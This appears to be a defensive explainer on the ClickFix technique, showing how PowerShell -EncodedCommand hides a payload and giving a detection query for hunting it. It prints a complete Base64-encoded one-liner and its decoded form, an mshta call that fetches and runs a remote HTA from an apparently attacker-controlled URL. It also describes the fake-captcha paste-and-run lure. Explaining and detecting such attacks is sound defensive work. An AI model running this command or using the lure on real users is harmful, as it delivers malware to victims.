Clickfix Encoded

PowerShell -EncodedCommand hides the payload in Base64. What you see in logs is opaque. What actually runs is revealed only when decoded.

This command runs on Windows
Example Command breakdown
Two views: as seen in the wild (encoded), and decoded to reveal the payload.

As seen (encoded)

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AYgByAHYAIgA=
1PowerShell

Invokes Windows PowerShell. The payload is hidden in the following encoded string.

powershell.exe 
2EncodedCommand

Short for -EncodedCommand. Accepts a Base64-encoded UTF-16LE string. PowerShell decodes and executes it.

-eC 
3Base64 payload

The actual command, encoded. Static analysis and signatures cannot see the payload. Decode to reveal.

bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AYgByAHYAIgA=

Decoded

mshta "https://getyourpages.com/downloads/brv"
1HTA host

Built-in Windows binary that runs the downloaded HTA from the URL.

mshta 
2Remote HTA URL

Attacker-controlled URL. The HTA contains VBScript/JScript that can run further payloads.

"https://getyourpages.com/downloads/brv"
How it works
The attack chain from victim execution to payload delivery
  1. 1

    Victim runs the encoded command

    The page copies the powershell.exe -eC one-liner. The Base64 blob hides the real payload. Victim pastes via Win+R, Ctrl+V, Enter.

  2. 2

    PowerShell decodes and executes

    -EncodedCommand decodes the Base64 (UTF-16LE) and runs it. The decoded command is mshta "https://...", which fetches and executes the remote HTA.

Implications
Why encoding is used and how it hinders defenders
  • Opaque to static analysis. Logs and process monitors show only Base64. No URL, no mshta, no obvious IOCs in the command line.
  • Signature bypass. String-based rules that look for mshta, http, or known URLs will not match the encoded form.
  • Same clickfix flow. Fake captcha, clipboard copy, Win+R, Ctrl+V, Enter. The only difference is the command format.
  • Hunt for -EncodedCommand. Defenders can look for powershell.exe with -e or -EncodedCommand and base64-like command lines. Decode at scale for analysis.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the encoded command via Win+R, Ctrl+V, Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Launch demo
Hunting
Detection queries for PowerShell -EncodedCommand
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
  and (ProcessCommandLine contains "-e " or ProcessCommandLine contains "-EncodedCommand")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine